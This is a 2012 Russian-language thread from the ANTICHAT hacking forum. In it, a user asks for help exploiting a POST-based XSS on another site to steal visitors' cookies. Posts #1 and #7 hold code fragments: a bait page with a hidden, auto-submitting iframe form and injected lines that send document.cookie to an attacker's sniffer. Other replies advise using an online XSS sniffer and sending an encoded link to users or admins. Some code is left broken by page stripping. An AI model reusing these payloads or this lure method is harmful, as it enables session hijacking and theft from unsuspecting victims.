HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.01.2012, 18:54
LABERT
Guest
Сообщений: n/a
Провел на форуме:
1927

Репутация: 0
По умолчанию

Недавно я нашел xss POST пассивку уязвимость на неком сайте site.com. Мною был создан сайт на бесплатном хостинге, где была размещена моя html страница, с framom, который открывает нашу страницу site.com/index.html, вводит скрипт в нашу форму "POST" и подтверждает её. В результате frame выводит его на http://evilhost.ru/user/login_form?login=xxx

В фрейме выполняется код по нашей форме "POST" и его перекидывает на бесплатный сниффер

document.location.href="http://sniff/s.php?"+document.cookie;'> Вот код на странице моего сайта:













alert(document.cookie)">







window.onload = function(){

var win = document.getElementById("iframe").contentWindow;

document.getElementById("form").onsubmit = function(e){

win.postMessage( document.getElementById("log").value );

win.postMessage( document.getElementById("pass").value );

win.postMessage( document.getElementById("pag").value );

e.preventDefault();

};

};





Если я в брузере ОПЕРА набираю свой сайт-приманку , он должен показать мне cookie c http://сайт с ХСС/user/login_form , выскакивает окошко :siteowner=1 и все .Получается cookie при загрузке iframe не передаются .Если отправляю iframe на сниффер то приходит:QUERY:siteowner=1, REFERER: http://мой_Сайт/form.html ,AGENT:Opera/9.80 (Windows.. и все.

ПОЧЕМУ в СКРИПТ script>alert(document.cookie) cookie не передаются ? Help...
 
Ответить с цитированием

  #2  
Старый 29.01.2012, 00:00
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

нихуя ты закатил речь, проще обьясни что ты зделал?
 
Ответить с цитированием

  #3  
Старый 29.01.2012, 01:04
NZT
Guest
Сообщений: n/a
Провел на форуме:
6075

Репутация: 0
По умолчанию

Я сам новичок в этом но с xss разобрался.

В этой статье все написано. Проще зделай как я : зарегся на online xss snifer тут , там есть уже готовый скрипт который ты должен подставлять после "=" в уязвимом сайте , и всю эту длиную ссылку (мне кажется лучше ее закодировать) даешь пользователю или админу чтобы он по ней прошел и тебе там в лог придут куки. Удачи.
 
Ответить с цитированием

  #4  
Старый 29.01.2012, 10:20
LABERT
Guest
Сообщений: n/a
Провел на форуме:
1927

Репутация: 0
По умолчанию

Цитата:
Сообщение от NZT  
NZT said:
Я сам новичок в этом но с xss разобрался.
В
этой
статье все написано. Проще зделай как я : зарегся на online xss snifer
тут
, там есть уже готовый скрипт который ты должен подставлять после "=" в уязвимом сайте , и всю эту длиную ссылку (мне кажется лучше ее закодировать) даешь пользователю или админу чтобы он по ней прошел и тебе там в лог придут куки. Удачи.
Так я и пользуюсь бесплатным online snifer , я же писал. Проблема

найти ошибку в моем post-запросе лежащем на моем сайте (см. выше). Ссылка типа: http://сайт сХСС/user/form?Login=akxhijfa&page= - ЭТО GET запрос , а уменя POST XSS....КАК сделать ссылку

,чтобы при нажатии на нее подгружалась заранее заполненная нами форма и чтобы она автоматом перебрасывала куки на snifer?
 
Ответить с цитированием

  #5  
Старый 30.01.2012, 22:52
LABERT
Guest
Сообщений: n/a
Провел на форуме:
1927

Репутация: 0
По умолчанию

Неужели такого рода уязвимость можно применить только в сочетании с CSRF ? Ну где же Вы спецы ?
 
Ответить с цитированием

  #6  
Старый 31.01.2012, 09:12
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Можно и POST юзнуть. Но только тебе придется заманить жертву на свой сайт, а потом уже со своего сайта редиректить на сайт жертвы.
 
Ответить с цитированием

  #7  
Старый 31.01.2012, 12:12
LABERT
Guest
Сообщений: n/a
Провел на форуме:
1927

Репутация: 0
По умолчанию

Цель именно такая , я заманиваю жертву ,подкидывая ему ссылку на свой сайт и с помощью этого кода ,c скрытым iframe:

Ferst;



function submit_form(){

window.evilframe.document.forms[0].submit();

}





он отправляется на заранее сформированную мною форму,которая сабмитит на сайт жертвы (уязвимый сайт с ХСС):

FORMA

img = new Image(); img.src = "http://сниффер"+document.cookie;"> //куки отправляются на сниффер



По идей куки должны приити ,но приходит только USER_AGENT,REFERER,IP,дата ,работу снифера проверял - работает,получается при переходе на мой сайт и отправке формы, в cookie ничего нет(просто пусто)... CSRF-защита или я что-то делаю не так?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ